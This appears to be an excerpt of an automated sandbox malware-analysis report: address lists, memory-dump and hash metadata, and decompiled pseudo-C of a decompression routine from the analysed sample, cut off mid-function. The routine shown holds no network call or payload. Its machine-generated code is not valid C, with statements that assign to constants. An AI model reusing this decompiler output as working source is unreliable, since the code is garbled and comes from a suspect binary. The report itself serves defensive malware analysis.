                                                  0x00406fcf
                                                  0x00406fd1
                                                  0x00406fd3
                                                  0x00406fd3
                                                  0x00406fed
                                                  0x00406ff4
                                                  0x00406ff7
                                                  0x00000000
                                                  0x00406ff9
                                                  0x00000000
                                                  0x00406ff9
                                                  0x00000000
                                                  0x00407286
                                                  0x00407286
                                                  0x0040728a
                                                  0x004075b1
                                                  0x00000000
                                                  0x004075b1
                                                  0x00407290
                                                  0x00407293
                                                  0x00407296
                                                  0x0040729a
                                                  0x0040729d
                                                  0x004072a3
                                                  0x004072a5
                                                  0x004072a5
                                                  0x004072a5
                                                  0x004072a8
                                                  0x00000000
                                                  0x00000000
                                                  0x00407056
                                                  0x00407056
                                                  0x00407059
                                                  0x004073cb
                                                  0x004073cb
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00407452
                                                  0x00407456
                                                  0x00407474
                                                  0x00407474
                                                  0x00407474
                                                  0x0040747b
                                                  0x00407482
                                                  0x00000000
                                                  0x00407482
                                                  0x00407458
                                                  0x0040745b
                                                  0x0040745e
                                                  0x00407461
                                                  0x00407468
                                                  0x00000000
                                                  0x00000000
                                                  0x00407543
                                                  0x00407546
                                                  0x00407447
                                                  0x00407447
                                                  0x00000000
                                                  0x00000000
                                                  0x0040717d
                                                  0x0040717f
                                                  0x00407186
                                                  0x00407187
                                                  0x00407189
                                                  0x0040718c
                                                  0x00000000
                                                  0x00000000
                                                  0x00407194
                                                  0x00407197
                                                  0x0040719a
                                                  0x0040719c
                                                  0x0040719e
                                                  0x0040719e
                                                  0x0040719f
                                                  0x004071a2
                                                  0x004071a9
                                                  0x004071ac
                                                  0x004071ba
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x0040749f
                                                  0x0040749f
                                                  0x004074a3
                                                  0x004075db
                                                  0x00000000
                                                  0x004075db
                                                  0x004074a9
                                                  0x004074ac
                                                  0x004074af
                                                  0x004074b3
                                                  0x004074b6
                                                  0x004074bc
                                                  0x004074be
                                                  0x004074be
                                                  0x004074be
                                                  0x004074c1
                                                  0x004074c4
                                                  0x004074c4
                                                  0x004074c4
                                                  0x004074c4
                                                  0x00000000
                                                  0x00000000
                                                  0x004071c2
                                                  0x004071c5
                                                  0x004071fb
                                                  0x0040732b
                                                  0x0040732b
                                                  0x0040732b
                                                  0x0040732b
                                                  0x0040732e
                                                  0x0040732e
                                                  0x00407331
                                                  0x00407333
                                                  0x004075bd
                                                  0x00000000
                                                  0x004075bd
                                                  0x00407339
                                                  0x0040733c
                                                  0x00000000
                                                  0x00000000
                                                  0x00407342
                                                  0x00407346
                                                  0x00407349
                                                  0x00407349
                                                  0x00407349
                                                  0x00000000
                                                  0x00407349
                                                  0x004071c7
                                                  0x004071c9
                                                  0x004071cb
                                                  0x004071cd
                                                  0x004071d0
                                                  0x004071d1
                                                  0x004071d3
                                                  0x004071d5
                                                  0x004071d8
                                                  0x004071db
                                                  0x004071f1
                                                  0x004071f6
                                                  0x0040722e
                                                  0x0040722e
                                                  0x00407232
                                                  0x0040725e
                                                  0x00407260
                                                  0x00407267
                                                  0x0040726a
                                                  0x0040726d
                                                  0x0040726d
                                                  0x00407272
                                                  0x00407272
                                                  0x00407274
                                                  0x00407277
                                                  0x0040727e
                                                  0x00407281
                                                  0x004072ae
                                                  0x004072ae
                                                  0x004072b1
                                                  0x004072b4
                                                  0x00407328
                                                  0x00407328
                                                  0x00407328
                                                  0x00000000
                                                  0x00407328
                                                  0x004072b6
                                                  0x004072bc
                                                  0x004072bf
                                                  0x004072c2
                                                  0x004072c5
                                                  0x004072c8
                                                  0x004072cb
                                                  0x004072ce
                                                  0x004072d1
                                                  0x004072d4
                                                  0x004072d7
                                                  0x004072f0
                                                  0x004072f2
                                                  0x004072f5
                                                  0x004072f6
                                                  0x004072f9
                                                  0x004072fb
                                                  0x004072fe
                                                  0x00407300
                                                  0x00407302
                                                  0x00407305
                                                  0x00407307
                                                  0x0040730a
                                                  0x0040730e
                                                  0x00407310
                                                  0x00407310
                                                  0x00407311
                                                  0x00407314
                                                  0x00407317
                                                  0x004072d9
                                                  0x004072d9
                                                  0x004072e1
                                                  0x004072e6
                                                  0x004072e8
                                                  0x004072eb
                                                  0x004072eb
                                                  0x0040731a
                                                  0x00407321
                                                  0x004072ab
                                                  0x004072ab
                                                  0x004072ab
                                                  0x004072ab
                                                  0x00000000
                                                  0x00407323
                                                  0x00000000
                                                  0x00407323
                                                  0x00407321
                                                  0x00407234
                                                  0x00407237
                                                  0x00407239
                                                  0x0040723c
                                                  0x0040723f
                                                  0x00407242
                                                  0x00407244
                                                  0x00407247
                                                  0x0040724a
                                                  0x0040724a
                                                  0x0040724d
                                                  0x0040724d
                                                  0x00407250
                                                  0x00407257
                                                  0x0040722b
                                                  0x0040722b
                                                  0x0040722b
                                                  0x0040722b
                                                  0x00000000
                                                  0x00407259
                                                  0x00000000
                                                  0x00407259
                                                  0x00407257
                                                  0x004071dd
                                                  0x004071e0
                                                  0x004071e2
                                                  0x004071e5
                                                  0x00000000
                                                  0x00000000
                                                  0x00406f44
                                                  0x00406f44
                                                  0x00406f48
                                                  0x0040758d
                                                  0x00000000
                                                  0x0040758d
                                                  0x00406f4e
                                                  0x00406f51
                                                  0x00406f54
                                                  0x00406f57
                                                  0x00406f5a
                                                  0x00406f5d
                                                  0x00406f60
                                                  0x00406f62
                                                  0x00406f65
                                                  0x00406f68
                                                  0x00406f6b
                                                  0x00406f6d
                                                  0x00406f6d
                                                  0x00406f6d
                                                  0x00000000
                                                  0x00000000
                                                  0x004070cf
                                                  0x004070cf
                                                  0x004070d3
                                                  0x00407599
                                                  0x00000000
                                                  0x00407599
                                                  0x004070d9
                                                  0x004070dc
                                                  0x004070df
                                                  0x004070e2
                                                  0x004070e4
                                                  0x004070e4
                                                  0x004070e4
                                                  0x004070e7
                                                  0x004070ea
                                                  0x004070ed
                                                  0x004070f0
                                                  0x004070f3
                                                  0x004070f6
                                                  0x004070f7
                                                  0x004070f9
                                                  0x004070f9
                                                  0x004070f9
                                                  0x004070fc
                                                  0x004070ff
                                                  0x00407102
                                                  0x00407105
                                                  0x00407105
                                                  0x00407105
                                                  0x00407108
                                                  0x0040710a
                                                  0x0040710a
                                                  0x00000000
                                                  0x00000000
                                                  0x0040734c
                                                  0x0040734c
                                                  0x0040734c
                                                  0x00407350
                                                  0x00000000
                                                  0x00000000
                                                  0x00407356
                                                  0x00407359
                                                  0x0040735c
                                                  0x0040735f
                                                  0x00407361
                                                  0x00407361
                                                  0x00407361
                                                  0x00407364
                                                  0x00407367
                                                  0x0040736a
                                                  0x0040736d
                                                  0x00407370
                                                  0x00407373
                                                  0x00407374
                                                  0x00407376
                                                  0x00407376
                                                  0x00407376
                                                  0x00407379
                                                  0x0040737c
                                                  0x0040737f
                                                  0x00407382
                                                  0x00407385
                                                  0x00407389
                                                  0x0040738b
                                                  0x0040738e
                                                  0x00000000
                                                  0x00407390
                                                  0x0040710d
                                                  0x0040710d
                                                  0x00000000
                                                  0x0040710d
                                                  0x0040738e
                                                  0x004075c3
                                                  0x004075e5
                                                  0x004075eb
                                                  0x004075ed
                                                  0x004075f4
                                                  0x004075f6
                                                  0x004075fd
                                                  0x00407601
                                                  0x00000000
                                                  0x00406bf2
                                                  0x004075fa
                                                  0x004075fa
                                                  0x00000000
                                                  0x004075fa
                                                  0x00407447
                                                  0x004074cd
                                                  0x004074d3
                                                  0x004074d6
                                                  0x004074d9
                                                  0x004074dc
                                                  0x004074df
                                                  0x004074e2
                                                  0x004074e5
                                                  0x004074e8
                                                  0x004074ee
                                                  0x00407507
                                                  0x0040750a
                                                  0x0040750d
                                                  0x00407510
                                                  0x00407514
                                                  0x00407516
                                                  0x00407517
                                                  0x0040751a
                                                  0x004074f0
                                                  0x004074f0
                                                  0x004074f8
                                                  0x004074fd
                                                  0x004074ff
                                                  0x00407502
                                                  0x00407502
                                                  0x00407524
                                                  0x00000000
                                                  0x00407526
                                                  0x00000000
                                                  0x00407526
                                                  0x00407524
                                                  0x00000000
                                                  0x00407399

                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.263281094.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.263266862.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263355807.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263371497.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263371497.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263371497.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263371497.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263371497.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263431713.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_T.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 97748a737734167d5846b9d8dd4738ada3f75d0b833fdafa89234df63502b4a5
                                                  • Instruction ID: d49815ad38d406b3cd0a1a90ea7be1526168d9e39684835ffa6a026ef1ef4849
                                                  • Opcode Fuzzy Hash: 97748a737734167d5846b9d8dd4738ada3f75d0b833fdafa89234df63502b4a5
                                                  • Instruction Fuzzy Hash: 91913270D04228DBEF28CF98C8547ADBBB1FF44305F14816AD856BB281D778A986DF45
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 004070AB Relevance: 5.2, APIs: 4, Instructions: 205COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 98%
                                                  			E004070AB() {
				unsigned short _t532;
				signed int _t533;
				void _t534;
				void* _t535;
				signed int _t536;
				signed int _t565;
				signed int _t568;
				signed int _t589;
				signed int* _t606;
				void* _t613;

				L0:
				while(1) {
					L0:
					if( *(_t613 - 0x40) != 0) {
						L89:
						 *((intOrPtr*)(_t613 - 0x80)) = 0x15;
						 *(_t613 - 0x58) =  *(_t613 - 4) + 0xa68;
						L69:
						_t606 =  *(_t613 - 0x58);
						 *(_t613 - 0x84) = 0x12;
						L132:
						 *(_t613 - 0x54) = _t606;
						L133:
						_t532 =  *_t606;
						_t589 = _t532 & 0x0000ffff;
						_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
						if( *(_t613 - 0xc) >= _t565) {
							 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
							 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
							 *(_t613 - 0x40) = 1;
							_t533 = _t532 - (_t532 >> 5);
							 *_t606 = _t533;
						} else {
							 *(_t613 - 0x10) = _t565;
							 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
							 *_t606 = (0x800 - _t589 >> 5) + _t532;
						}
						if( *(_t613 - 0x10) >= 0x1000000) {
							L139:
							_t534 =  *(_t613 - 0x84);
							L140:
							 *(_t613 - 0x88) = _t534;
							goto L1;
						} else {
							L137:
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 5;
								goto L170;
							}
							 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
							goto L139;
						}
					} else {
						if( *(__ebp - 0x60) == 0) {
							L171:
							_t536 = _t535 | 0xffffffff;
							L172:
							return _t536;
						}
						__eax = 0;
						_t258 =  *(__ebp - 0x38) - 7 >= 0;
						0 | _t258 = _t258 + _t258 + 9;
						 *(__ebp - 0x38) = _t258 + _t258 + 9;
						L75:
						if( *(__ebp - 0x64) == 0) {
							 *(__ebp - 0x88) = 0x1b;
							L170:
							_t568 = 0x22;
							memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
							_t536 = 0;
							goto L172;
						}
						__eax =  *(__ebp - 0x14);
						__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
						if(__eax >=  *(__ebp - 0x74)) {
							__eax = __eax +  *(__ebp - 0x74);
						}
						__edx =  *(__ebp - 8);
						__cl =  *(__eax + __edx);
						__eax =  *(__ebp - 0x14);
						 *(__ebp - 0x5c) = __cl;
						 *(__eax + __edx) = __cl;
						__eax = __eax + 1;
						__edx = 0;
						_t274 = __eax %  *(__ebp - 0x74);
						__eax = __eax /  *(__ebp - 0x74);
						__edx = _t274;
						__eax =  *(__ebp - 0x68);
						 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
						 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
						_t283 = __ebp - 0x64;
						 *_t283 =  *(__ebp - 0x64) - 1;
						 *( *(__ebp - 0x68)) = __cl;
						L79:
						 *(__ebp - 0x14) = __edx;
						L80:
						 *(__ebp - 0x88) = 2;
					}
					L1:
					_t535 =  *(_t613 - 0x88);
					if(_t535 > 0x1c) {
						goto L171;
					}
					switch( *((intOrPtr*)(_t535 * 4 +  &M00407602))) {
						case 0:
							if( *(_t613 - 0x6c) == 0) {
								goto L170;
							}
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							_t535 =  *( *(_t613 - 0x70));
							if(_t535 > 0xe1) {
								goto L171;
							}
							_t539 = _t535 & 0x000000ff;
							_push(0x2d);
							asm("cdq");
							_pop(_t570);
							_push(9);
							_pop(_t571);
							_t609 = _t539 / _t570;
							_t541 = _t539 % _t570 & 0x000000ff;
							asm("cdq");
							_t604 = _t541 % _t571 & 0x000000ff;
							 *(_t613 - 0x3c) = _t604;
							 *(_t613 - 0x1c) = (1 << _t609) - 1;
							 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t541 / _t571) - 1;
							_t612 = (0x300 << _t604 + _t609) + 0x736;
							if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
								L10:
								if(_t612 == 0) {
									L12:
									 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
									 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
									goto L15;
								} else {
									goto L11;
								}
								do {
									L11:
									_t612 = _t612 - 1;
									 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
								} while (_t612 != 0);
								goto L12;
							}
							if( *(_t613 - 4) != 0) {
								GlobalFree( *(_t613 - 4));
							}
							_t535 = GlobalAlloc(0x40, 0x600); // executed
							 *(_t613 - 4) = _t535;
							if(_t535 == 0) {
								goto L171;
							} else {
								 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
								goto L10;
							}
						case 1:
							L13:
							__eflags =  *(_t613 - 0x6c);
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 1;
								goto L170;
							}
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							_t45 = _t613 - 0x48;
							 *_t45 =  *(_t613 - 0x48) + 1;
							__eflags =  *_t45;
							L15:
							if( *(_t613 - 0x48) < 4) {
								goto L13;
							}
							_t547 =  *(_t613 - 0x40);
							if(_t547 ==  *(_t613 - 0x74)) {
								L20:
								 *(_t613 - 0x48) = 5;
								 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
								goto L23;
							}
							 *(_t613 - 0x74) = _t547;
							if( *(_t613 - 8) != 0) {
								GlobalFree( *(_t613 - 8));
							}
							_t535 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
							 *(_t613 - 8) = _t535;
							if(_t535 == 0) {
								goto L171;
							} else {
								goto L20;
							}
						case 2:
							L24:
							_t554 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
							 *(_t613 - 0x84) = 6;
							 *(_t613 - 0x4c) = _t554;
							_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t554) * 2;
							goto L132;
						case 3:
							L21:
							__eflags =  *(_t613 - 0x6c);
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 3;
								goto L170;
							}
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							_t67 = _t613 - 0x70;
							 *_t67 =  &(( *(_t613 - 0x70))[1]);
							__eflags =  *_t67;
							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
							L23:
							 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
							if( *(_t613 - 0x48) != 0) {
								goto L21;
							}
							goto L24;
						case 4:
							goto L133;
						case 5:
							goto L137;
						case 6:
							__edx = 0;
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x34) = 1;
								 *(__ebp - 0x84) = 7;
								__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x5c) & 0x000000ff;
							__esi =  *(__ebp - 0x60);
							__cl = 8;
							__cl = 8 -  *(__ebp - 0x3c);
							__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
							__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
							__ecx =  *(__ebp - 0x3c);
							__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
							__ecx =  *(__ebp - 4);
							(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
							__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
							__eflags =  *(__ebp - 0x38) - 4;
							__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
							 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
							if( *(__ebp - 0x38) >= 4) {
								__eflags =  *(__ebp - 0x38) - 0xa;
								if( *(__ebp - 0x38) >= 0xa) {
									_t98 = __ebp - 0x38;
									 *_t98 =  *(__ebp - 0x38) - 6;
									__eflags =  *_t98;
								} else {
									 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
								}
							} else {
								 *(__ebp - 0x38) = 0;
							}
							__eflags =  *(__ebp - 0x34) - __edx;
							if( *(__ebp - 0x34) == __edx) {
								__ebx = 0;
								__ebx = 1;
								goto L61;
							} else {
								__eax =  *(__ebp - 0x14);
								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
								__eflags = __eax -  *(__ebp - 0x74);
								if(__eax >=  *(__ebp - 0x74)) {
									__eax = __eax +  *(__ebp - 0x74);
									__eflags = __eax;
								}
								__ecx =  *(__ebp - 8);
								__ebx = 0;
								__ebx = 1;
								__al =  *((intOrPtr*)(__eax + __ecx));
								 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
								goto L41;
							}
						case 7:
							__eflags =  *(__ebp - 0x40) - 1;
							if( *(__ebp - 0x40) != 1) {
								__eax =  *(__ebp - 0x24);
								 *(__ebp - 0x80) = 0x16;
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x28);
								 *(__ebp - 0x24) =  *(__ebp - 0x28);
								__eax =  *(__ebp - 0x2c);
								 *(__ebp - 0x28) =  *(__ebp - 0x2c);
								__eax = 0;
								__eflags =  *(__ebp - 0x38) - 7;
								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
								__al = __al & 0x000000fd;
								__eax = (__eflags >= 0) - 1 + 0xa;
								 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
								__eax =  *(__ebp - 4);
								__eax =  *(__ebp - 4) + 0x664;
								__eflags = __eax;
								 *(__ebp - 0x58) = __eax;
								goto L69;
							}
							__eax =  *(__ebp - 4);
							__ecx =  *(__ebp - 0x38);
							 *(__ebp - 0x84) = 8;
							__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
							goto L132;
						case 8:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xa;
								__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
							} else {
								__eax =  *(__ebp - 0x38);
								__ecx =  *(__ebp - 4);
								__eax =  *(__ebp - 0x38) + 0xf;
								 *(__ebp - 0x84) = 9;
								 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
								__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
							}
							goto L132;
						case 9:
							goto L0;
						case 0xa:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xb;
								__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x28);
							goto L88;
						case 0xb:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__ecx =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x20);
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
							} else {
								__eax =  *(__ebp - 0x24);
							}
							__ecx =  *(__ebp - 0x28);
							 *(__ebp - 0x24) =  *(__ebp - 0x28);
							L88:
							__ecx =  *(__ebp - 0x2c);
							 *(__ebp - 0x2c) = __eax;
							 *(__ebp - 0x28) =  *(__ebp - 0x2c);
							goto L89;
						case 0xc:
							L99:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xc;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t334 = __ebp - 0x70;
							 *_t334 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t334;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							__eax =  *(__ebp - 0x2c);
							goto L101;
						case 0xd:
							L37:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xd;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t122 = __ebp - 0x70;
							 *_t122 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t122;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							L39:
							__eax =  *(__ebp - 0x40);
							__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
							if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
								goto L48;
							}
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								goto L54;
							}
							L41:
							__eax =  *(__ebp - 0x5b) & 0x000000ff;
							 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
							__ecx =  *(__ebp - 0x58);
							__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
							 *(__ebp - 0x48) = __eax;
							__eax = __eax + 1;
							__eax = __eax << 8;
							__eax = __eax + __ebx;
							__esi =  *(__ebp - 0x58) + __eax * 2;
							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edx = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
							__eflags =  *(__ebp - 0xc) - __ecx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								 *(__ebp - 0x40) = 1;
								__cx = __ax >> 5;
								__eflags = __eax;
								__ebx = __ebx + __ebx + 1;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edx;
								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags =  *(__ebp - 0x10) - 0x1000000;
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								goto L39;
							} else {
								goto L37;
							}
						case 0xe:
							L46:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xe;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t156 = __ebp - 0x70;
							 *_t156 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t156;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							while(1) {
								L48:
								__eflags = __ebx - 0x100;
								if(__ebx >= 0x100) {
									break;
								}
								__eax =  *(__ebp - 0x58);
								__edx = __ebx + __ebx;
								__ecx =  *(__ebp - 0x10);
								__esi = __edx + __eax;
								__ecx =  *(__ebp - 0x10) >> 0xb;
								__ax =  *__esi;
								 *(__ebp - 0x54) = __esi;
								__edi = __ax & 0x0000ffff;
								__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
								__eflags =  *(__ebp - 0xc) - __ecx;
								if( *(__ebp - 0xc) >= __ecx) {
									 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
									 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
									__cx = __ax;
									_t170 = __edx + 1; // 0x1
									__ebx = _t170;
									__cx = __ax >> 5;
									__eflags = __eax;
									 *__esi = __ax;
								} else {
									 *(__ebp - 0x10) = __ecx;
									0x800 = 0x800 - __edi;
									0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
									__ebx = __ebx + __ebx;
									 *__esi = __cx;
								}
								__eflags =  *(__ebp - 0x10) - 0x1000000;
								 *(__ebp - 0x44) = __ebx;
								if( *(__ebp - 0x10) >= 0x1000000) {
									continue;
								} else {
									goto L46;
								}
							}
							L54:
							_t173 = __ebp - 0x34;
							 *_t173 =  *(__ebp - 0x34) & 0x00000000;
							__eflags =  *_t173;
							goto L55;
						case 0xf:
							L58:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xf;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t203 = __ebp - 0x70;
							 *_t203 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t203;
